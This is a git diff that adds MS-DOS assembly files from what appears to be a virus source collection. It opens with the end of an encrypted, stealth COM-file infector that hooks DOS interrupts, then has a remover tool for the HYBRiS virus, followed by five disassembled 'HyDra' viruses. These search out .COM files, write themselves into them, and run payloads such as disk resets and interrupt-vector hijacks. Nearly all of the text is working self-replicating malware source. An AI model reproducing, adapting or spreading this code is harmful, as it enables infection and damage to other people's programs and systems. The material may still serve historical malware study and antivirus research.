;Tbav utils might intercept this + pushf ;action. + push cs + call o21h + xchg ax,bx + + push cs ;cs=ds=es + pop ds + push cs + pop es + + mov ax,5700h ;get time + int 21h + push cx + push dx + + and cl,1fh ;see if seconds = 29 + xor cl,1dh + jne close_dis ;its not! (file = not infected) + + mov ah,3fh ;read first bytes of the infected + mov cx,4 ;program + mov dx,offset ds:orgjmp + int 21h + + cmp byte ptr ds:orgjmp,0e9h ;first byte = jmp? + jne close_dis + + cmp byte ptr ds:orgjmp+3,'@' ;fourth byte = '@'? + jne close_dis + + mov ax,4202h ;opened file is infected, + mov cx,-1 ;seek the location where we + mov dx,-(virus_end-orgjmp) ;stored the first bytes of the + int 21h ;original program + + mov ah,3fh ;read those bytes to orgjmp + mov cx,4 + mov dx,offset ds:orgjmp + int 21h + + mov ax,4200h ;seek the beginning of file + xor cx,cx + xor dx,dx + int 21h + + mov ah,40h ;write the original bytes to + mov dx,offset orgjmp ;the top of file + mov cx,4 + int 21h + + mov ax,4202h ;seek (endoffile-virussize) + mov cx,-1 + mov dx,-(virus_end-install) + int 21h + + mov ah,40h ;truncate file + xor cx,cx + int 21h + +close_dis: + mov ax,5701h ;restore saved + pop dx ;date + pop cx ;and time + int 21h ; + + mov ah,3eh ;close the file + pushf + push cs + call o21h + +no_com_opened: + pop es + pop ds + pop si + pop di + pop dx + pop cx + pop bx + pop ax + +bail_out: + jmp o21h ;and bail out! + + +random: + push ds + push bx + push cx + push dx + push ax + + xor ax,ax + int 1ah + push cs + pop ds + in al,40h + xchg cx,ax + xchg dx,ax + mov bx,offset ran_num + xor ds:[bx],ax + rol word ptr ds:[bx],cl + xor cx,ds:[bx] + rol ax,cl + xor dx,ds:[bx] + ror dx,cl + xor ax,dx + imul dx + xor ax,dx + xor ds:[bx],ax + pop cx + xor dx,dx + inc cx + je random_ret + div cx + xchg ax,dx +random_ret: + pop dx + pop cx + pop bx + pop ds + or ax,ax + ret + + +SetCritical: + push ax ds + mov ax,9 + mov ds,ax + push word ptr ds:[0] + push word ptr ds:[2] + pop word ptr cs:[OldCritical+2] + pop word ptr cs:[OldCritical] + mov word ptr ds:[0],offset CriticalError + push cs + pop word ptr ds:[02] + pop ds + pop ax + ret + +ResetCritical: + push ax + push ds + push word ptr cs:[OldCritical] + mov ax,9 + push word ptr cs:[OldCritical+2] + mov ds,ax + pop word ptr ds:[2] + pop word ptr ds:[0] + pop ds + pop ax + ret + +CriticalError: ;new int24h handler + mov al,3 ;returns no error + iret + +OldCritical dd 0 ;dw 0,0 +ran_num dw ? + +decrypt: +encrypt: + mov ax,word ptr ds:[bp+enc_val] ;enc value in ax + lea di,[bp+install] ;pointer to encryption start + mov cx,(encrypt-install)/2 ;number of words to be encrypted +xor_loopy: + xor word ptr ds:[di],ax + inc di + inc di + loop xor_loopy + ret +enc_val dw 0 + +entry_point: + call get_bp ;to get the delta offset + ;classic old trick.. +get_bp: + pop bp + sub bp, offset get_bp + + call decrypt ;decrypt virus + jmp install ;jmp to install code + +newjmp db 0e9h,00h,00h,'@' ;buffer to calculate a new entry +orgjmp db 0cdh,20h,00,00 ;buffer to save the 4 first bytes + +virus_end: +end virus_start +================================================================================ diff --git a/MSDOS/Virus.MSDOS.Unknown.hybrisav.asm b/MSDOS/Virus.MSDOS.Unknown.hybrisav.asm new file mode 100644 index 00000000..d909510e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hybrisav.asm @@ -0,0 +1,341 @@ +.model tiny +.code +org 100h + +start: + +jmp short begin_code + +copyright db "HYBRiS.1435 Remover. (c) 1995 The Unforgiven/Immortal Riot",0 + +begin_code: +push dx ; Cool self-check.. +push ds +mov ah,9 +mov dx,offset intro_msg +int 21h +pop bx +pop dx +cmp bx,dx +jne wrong +mov ah,9 +mov dx,offset ok_msg +int 21h +jmp short start_msg1 + +wrong: +mov ah,9 +mov dx,offset wrong_msg +int 21h +int 20h + +intro_msg db 'Selfcheck $' +ok_msg db 'OK',13,10,'$' +wrong_msg db 'Failed',13,10,'$' + + +start_msg1: + +mov ah,9 ;print starting msg... +mov dx, offset begin +int 21h + +mov ah,0 ;did they agree on the rules? +int 16h + +cmp ah,15h ;y/Y +je ok_phile ;yes, they did + +mov ah,9 ;print blah.. +mov dx, offset not_yes +int 21h +int 20h +not_yes db "User Failure!",13,10,07,36 + + +ok_phile: +mov ah,4ah ;Do a virus installation check. . . +mov bx,0ffffh +mov cx,0d00dh +int 21h + +cmp ax,cx ;ax=cx=d00d= the virus is TSR. . . +jne not_res + +mov ah,9 +mov dx, offset resident +int 21h +int 20h + +not_res: +mov ah,2fh ;Get DTA-area to es:bx +int 21h + +mov ah,4eh ;find first file matching ds:dx (com) + ;with any attribute +next: +mov cx,7 +mov dx, offset f_com +int 21h + +jc no_com ;we have no more com-files + +call main ;got a com-file - search it + +mov ah,4fh ;get next com-file +jmp short next + +no_com: + + + +terminate: ;no more files! + +mov ah,9 +mov dx, offset stat1 +int 21h + +; This nice statistics is made by Blonde. Greetings to him. + +mov dx, word ptr [count] +call dec16out + +mov ah,9 +mov dx, offset stat2 +int 21h + +mov dx, word ptr [inf] +call dec16out + +mov ax,4cffh +int 21h + +main: +inc byte ptr [count] + +push ax +push bx +push cx +push dx +push di +push si + +push es +push es +pop ds +push cs +pop es + +mov si,bx +add si,1Eh ;bx = pointer to fname (1eh) +mov di,offset fname_buf +mov cx,0Fh ;cx=15 + +push cx ;save cx = 15 +push di ;save di (fname) +rep movsb ;rep until cx=0 +pop di ;restore di +pop cx ;and set cx=15 + +xor al,al ;zero out al +cld ;Clear direction +repne scasb ;Scan es:[di] for al +push di ;save di +mov al,20h ; +rep stosb ;Store al (fname) to es:[di] + +mov byte ptr es:[di],36 ;'$' + +pop di +pop es + +push cs +pop ds + +;mov ah,9 ;print fname +;mov dx,offset fname_buf +;int 21h + + +mov cx,15 ;with BIOS function due to this procedure +mov si, offset fname_buf ;can be used quite frequently. This is +lup: lodsb ;faster +int 29h ;mov ah,0ch, int 10h +loop lup + +mov ax,3d02h ;prepare open in read/write access +mov dx,bx ;bx into dx +add dx,1eh ;bx = pointer to fname +push es ;make es=ds +pop ds +int 21h ;do it! +jnc read_file + +mov ah,9 ;uerm? we couldnt open the file +mov dx, offset error_open ;fucking write-protected.. or lame coding +int 21h ;not zoinking f_attribs?? +jmp no_inf + +read_file: + +mov bx,ax ;place file handle in bx + +mov ah,3fh ;read first 4 bytes of the file +mov cx,4 ;to a buffer in memory +mov dx, offset read_buf +int 21h + +cmp byte ptr ds:[read_buf+3],'@' ;4th byte = @? +jne No_inf + +cmp byte ptr ds:[read_buf],0e9h ;1st byte = jmp? +jne no_inf + +inc byte ptr [inf] + +mov ah,9 ;say that the file is infected +mov dx, offset is_inf +int 21h + +mov ah,0 ;wait keypress +int 16h + +cmp ah,15h ;y/Y ? +je remove ; => they want to remove it.. +jmp no_inf + +remove: +mov ax,4202h +mov cx,-1 +mov dx,-4 +int 21h + +mov ah,3fh ;read those bytes to a buffer +mov cx,4 +mov dx,offset read_buf +int 21h + +mov ax,4200h ;seek the beginning of file +xor cx,cx +xor dx,dx +int 21h + +mov ah,40h ;write the original bytes to +mov dx,offset read_buf ;the top of file +mov cx,4 +int 21h + +mov ax,4202h ;seek (filesize-vir_size) +mov cx,-1 +mov dx,-1435 +int 21h + +mov ah,40h ;truncate vir_size.. +xor cx,cx +int 21h + + +mov ah,9 ;Report that the file is clean. . . +mov dx, offset _clean +int 21h +mov byte ptr [clean_f],1 + +no_inf: + +cmp byte ptr [clean_f],1 +je skip +mov ah,9 ;say that the file is infected +mov dx, offset is_cle +int 21h + +skip: +mov ah,9 ;print linefeed instead of +mov dx, offset linefeed ;mov byte ptr es:[di-1],13 +int 21h ;mov byte ptr es:[di],10 + ;mov byte ptr es:[di+1],36 (see above) + ;this is simpler for reporting. . . + +mov ah,3eh ;close file +int 21h + +pop si ;restore registers in use +pop si +pop dx +pop cx +pop bx +pop ax + +ret ;and return to caller + + +dec16out: +push ds ;This convertation is +push di ;Blonde(tm) +push dx +push cx +push ax +xor cx,cx ;initialize the counter +lea di, buf ;point to a buffer + +dec16out1: +push cx ;save the count +mov ax,dx ;AX is the numerator +xor dx,dx ;clear upper half +mov cx,10 ;divisor of 10 +div cx ;divide +xchg ax,dx ;get quotient + +add al,30h ;increase to ASCII +mov [di],al ;put in byte in ascii-format +inc di ;point to next byte + +pop cx ;restore count +inc cx ;count the digit +or dx,dx ;done? (dx=0?) +jnz dec16out1 ;if not zero, loop until dx = 0 + +dec16out2: +dec di ;decreasment of di +mov dl,[di] +mov ah,2 +int 21h ;write dl to screen output +loop dec16out2 + +pop ax ;restore registers +pop cx +pop dx +pop di +pop ds +ret ;and return + + +begin: + +db "Remover for the HYBRIS virus: This program is free of charge for all users.",13,10 +db 'DISCLAIMER: This software is provided "AS IS" without warranty of any kind,',13,10 +db "either expressed or implied, including but not limited to the fitness for",13,10 +db "any particular purpose. The entire risc as to its quality of performance",13,10 +db "is assumed by the user. Agree with those rules [Y/N]",13,10,36 + +f_com db "*.COM",0 ;COM-spec +buf dw ? +read_buf db ?,?,?,? ;4 buffers to read into +is_inf db "Is infected! Remove it? [Y/N]$ " +_clean db " File is now clean....$" +is_cle db "is clean...$" +error_open db " Error open file$ ";shouldnt happen. . . +resident db "Virus is already resident, aborting$" +fname_buf db 65 dup (?) ;fname = max 64, but ah well! +linefeed db 0ah,0dh,'$' ;linefeed+ end of print marker. +count dw 0 +inf dw 0 +clean_f db ? +host_clean db "Self-checking OK!",13,10,36 +host_infected db "Program is infected and will not run$",13,10 +stat1 db 13,10 + db "Number of files scanned: $" +stat2 db 13,10 + db "Number of files cleaned: $" + +end start +================================================================================ diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra1.asm b/MSDOS/Virus.MSDOS.Unknown.hydra1.asm new file mode 100644 index 00000000..8ae77eba --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra1.asm @@ -0,0 +1,196 @@ + +PAGE 59,132 + +; +; +; HYDRA1 +; +; Created: 27-Aug-91 +; Passes: 5 Analysis Options on: AW +; Copyright (c) +; +; + +psp_cmd_size equ 80h +data_12e equ 100h +data_13e equ 193h +data_14e equ 196h +data_15e equ 271h +data_16e equ 293h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra1 proc far + +start: + jmp loc_1 + pop cx + inc sp + add [bx+si],al +data_3 db 'HyDra-1 Beta - Not For Release' + db '. *.CO?' + db 0 +data_6 dw 0, 8B39h +data_8 dw 0 +data_9 db 0 + db 29 dup (0) +data_10 db 0 + db 13 dup (0) +data_11 db 'HYDRA$' +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. $' +loc_1: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,193h + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_9 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_3+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_2: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_10 + mov al,2 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_13e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,193h + mov cs:data_8,ax + cmp word ptr ds:data_14e,4459h + jne loc_3 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_6 ; Jump if carry Set + jmp short loc_2 +loc_3: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_4 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_8 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_4: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_5: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_7 + nop +loc_6: + push dx + xor ax,ax ; Zero register + mov ax,0F00h + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + ; ah=columns on screen + mov ah,0 + int 10h ; Video display ah=functn 00h + ; set display mode in al + mov ax,200h + mov dh,6 + mov dl,25h ; '%' + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + xor dx,dx ; Zero register + mov dx,offset data_11 ; ('HYDRA') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ax,200h + mov dh,17h + mov dl,0 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + mov dx,offset copyright ; ('Copyright (c)') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ax,200h + mov dh,18h + mov dl,0 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + mov ax,3504h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ax,es + mov dx,bx + mov ds,ax + mov ax,2509h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_7: + xor di,di ; Zero register + mov si,data_15e + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_6,0 + mov word ptr cs:data_6+2,es + pop bx + jmp dword ptr cs:data_6 + push ds + pop es + mov cx,0FFFFh + mov si,data_16e + mov di,data_12e + sub cx,si + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[100h],100h + mov word ptr cs:[102h],ds + mov ax,bx + jmp dword ptr cs:[100h] + int 20h ; DOS program terminate + +hydra1 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra2.asm b/MSDOS/Virus.MSDOS.Unknown.hydra2.asm new file mode 100644 index 00000000..eb7f002e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra2.asm @@ -0,0 +1,164 @@ + +PAGE 59,132 + +; +; +; HYDRA2 +; +; Created: 27-Aug-91 +; Passes: 5 Analysis Options on: AW +; Copyright (c) +; +; + +data_1e equ 100h +data_2e equ 235h +data_3e equ 257h +data_4e equ 522h +psp_cmd_size equ 80h +data_15e equ 157h +data_16e equ 15Ah + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra2 proc far + +start: + jmp loc_1 + pop cx + inc sp + add [bx+si],al +data_7 db 'HyDra-2 Beta - Not For Release' + db '. *.CO?' + db 0 +data_10 dw 0, 8B39h +data_12 dw 0 +data_13 db 0 + db 29 dup (0) +data_14 db 0 + db 13 dup (0) +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. ' +loc_1: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,157h + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_13 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_7+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_2: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_14 + mov al,2 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_15e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,157h + mov cs:data_12,ax + cmp word ptr ds:data_16e,4459h + jne loc_3 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_6 ; Jump if carry Set + jmp short loc_2 +loc_3: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_4 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_12 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_4: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_5: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_7 + nop +loc_6: + push dx + xor ax,ax ; Zero register + xor ax,ax ; Zero register + mov ds,ax + mov bx,data_4e + mov ah,0FFh + mov [bx],ah + xor ax,ax ; Zero register + int 13h ; Disk dl=drive 0 ah=func 00h + ; reset disk, al=return status + mov ax,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_7: + xor di,di ; Zero register + mov si,data_2e + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_10,0 + mov word ptr cs:data_10+2,es + pop bx + jmp dword ptr cs:data_10 + push ds + pop es + mov cx,0FFFFh + mov si,data_3e + mov di,data_1e + sub cx,si + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[100h],100h + mov word ptr cs:[102h],ds + mov ax,bx + jmp dword ptr cs:[100h] + int 20h ; DOS program terminate + +hydra2 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra3.asm b/MSDOS/Virus.MSDOS.Unknown.hydra3.asm new file mode 100644 index 00000000..c783c8f1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra3.asm @@ -0,0 +1,163 @@ + +PAGE 59,132 + +; +; +; HYDRA3 +; +; Created: 27-Aug-91 +; Passes: 5 Analysis Options on: AW +; Copyright (c) +; +; + +psp_cmd_size equ 80h +data_11e equ 100h +data_12e equ 156h +data_13e equ 159h +data_14e equ 234h +data_15e equ 256h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra3 proc far + +start: + jmp loc_1 + pop cx + inc sp + add [bx+si],al +data_3 db 'HyDra-3 Beta - Not For Release' + db '. *.CO?' + db 0 +data_6 dw 0, 8B39h +data_8 dw 0 +data_9 db 0 + db 29 dup (0) +data_10 db 0 + db 13 dup (0) +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. ' +loc_1: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,156h + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_9 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_3+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_2: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_10 + mov al,2 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_12e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,156h + mov cs:data_8,ax + cmp word ptr ds:data_13e,4459h + jne loc_3 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_6 ; Jump if carry Set + jmp short loc_2 +loc_3: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_4 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_8 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_4: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_5: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_7 + nop +loc_6: + push dx + mov ax,3504h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ax,es + mov dx,bx + mov ds,ax + mov ax,2513h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_7: + xor di,di ; Zero register + mov si,data_14e + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_6,0 + mov word ptr cs:data_6+2,es + pop bx + jmp dword ptr cs:data_6 + push ds + pop es + mov cx,0FFFFh + mov si,data_15e + mov di,data_11e + sub cx,si + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[100h],100h + mov word ptr cs:[102h],ds + mov ax,bx + jmp dword ptr cs:[100h] + int 20h ; DOS program terminate + +hydra3 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra4.asm b/MSDOS/Virus.MSDOS.Unknown.hydra4.asm new file mode 100644 index 00000000..53f3eeaa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra4.asm @@ -0,0 +1,163 @@ + +PAGE 59,132 + +; +; +; HYDRA4 +; +; Created: 28-Aug-91 +; Passes: 5 Analysis Options on: AW +; Copyright (c) +; +; + +psp_cmd_size equ 80h +data_11e equ 100h +data_12e equ 154h +data_13e equ 157h +data_14e equ 232h +data_15e equ 254h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra4 proc far + +start: + jmp loc_1 + pop cx + inc sp + add [bx+si],al +data_3 db 'HyDra-4 Beta - Not For Release' + db '. *.CO?' + db 0 +data_6 dw 0, 8B39h +data_8 dw 0 +data_9 db 0 + db 29 dup (0) +data_10 db 0 + db 13 dup (0) +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. ' +loc_1: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,154h + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_9 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_3+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_2: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_10 + mov al,2 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_12e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,154h + mov cs:data_8,ax + cmp word ptr ds:data_13e,4459h + jne loc_3 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_6 ; Jump if carry Set + jmp short loc_2 +loc_3: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_4 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_8 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_4: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_5: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_7 + nop +loc_6: + push dx + mov ax,3540h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov dx,bx + push es + pop ds + mov ax,2513h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,0 + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx +loc_7: + xor di,di ; Zero register + mov si,data_14e + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_6,0 + mov word ptr cs:data_6+2,es + pop bx + jmp dword ptr cs:data_6 + push ds + pop es + mov cx,0FFFFh + mov si,data_15e + mov di,data_11e + sub cx,si + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[100h],100h + mov word ptr cs:[102h],ds + mov ax,bx + jmp dword ptr cs:[100h] + int 20h ; DOS program terminate + +hydra4 endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.hydra5.asm b/MSDOS/Virus.MSDOS.Unknown.hydra5.asm new file mode 100644 index 00000000..8bd5a8e3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hydra5.asm @@ -0,0 +1,189 @@ + +PAGE 59,132 + +; +; +; HYDRA5 +; +; Created: 21-Aug-91 +; Passes: 5 Analysis Options on: AW +; Copyright (c) +; +; + +data_1e equ 23Eh +psp_cmd_size equ 80h +data_17e equ 187h +data_18e equ 18Ah + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +hydra5 proc far + +start: + jmp loc_1 + pop cx + inc sp + add [bx+si],al +data_4 db 'HyDra-5 Beta - Not For Release' + db '. *.CO?' + db 0 +data_7 dw 0, 8B39h +data_9 dw 0 +data_10 db 0 + db 29 dup (0) +data_11 db 0 + db 13 dup (0) +copyright db 'Copyright (c)' + db ' 1991 by C.A.V.E. ' +loc_1: + push ax + mov ax,cs + add ax,1000h + xor di,di ; Zero register + mov cx,187h + mov si,100h + mov es,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ah,1Ah + mov dx,offset data_10 + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ah,4Eh ; 'N' + mov dx,offset data_4+22h ; ('*') + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_5 ; Jump if carry Set +loc_2: + mov ah,3Dh ; '=' + mov al,2 + mov dx,offset data_11 + mov al,2 + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + push es + pop ds + mov ax,3F00h + mov cx,0FFFFh + mov dx,data_17e + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + add ax,187h + mov cs:data_9,ax + cmp word ptr ds:data_18e,4459h + jne loc_3 ; Jump if not equal + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match +;* jc loc_6 ; Jump if carry Set + db 72h, 54h + jmp short loc_2 +loc_3: + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_4 ; Jump if carry Set + mov ah,40h ; '@' + xor dx,dx ; Zero register + mov cx,cs:data_9 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_4: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_5: + mov ah,1Ah + mov dx,psp_cmd_size + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + jmp short loc_7 + nop + inc word ptr [bx+si] + add [bx+si],al + add [bx+si],al + pop ds + add [bx],bh + aas ; Ascii adjust + aas ; Ascii adjust + aas ; Ascii adjust + aas ; Ascii adjust + aas ; Ascii adjust + aas ; Ascii adjust + aas ; Ascii adjust + inc bp + pop ax + inc bp + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add ds:data_1e[bx+si],bh + push ax + push cs + pushf ; Push flags + mov cl,13h + mov dx,201h + push cs + pop ds + jmp dword ptr data_14 + mov ah,4Ch ; 'L' + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +data_14 dd 000C0h + db 0CDh, 20h +loc_7: + xor di,di ; Zero register + mov si,265h + mov cx,22h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop bx + mov cs:data_7,0 + mov word ptr cs:data_7+2,es + pop bx + jmp dword ptr cs:data_7 + push ds + pop es + mov cx,0FFFFh + mov si,287h + mov di,100h + sub cx,si + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov word ptr cs:[100h],100h + mov word ptr cs:[102h],ds + mov ax,bx + jmp dword ptr cs:[100h] 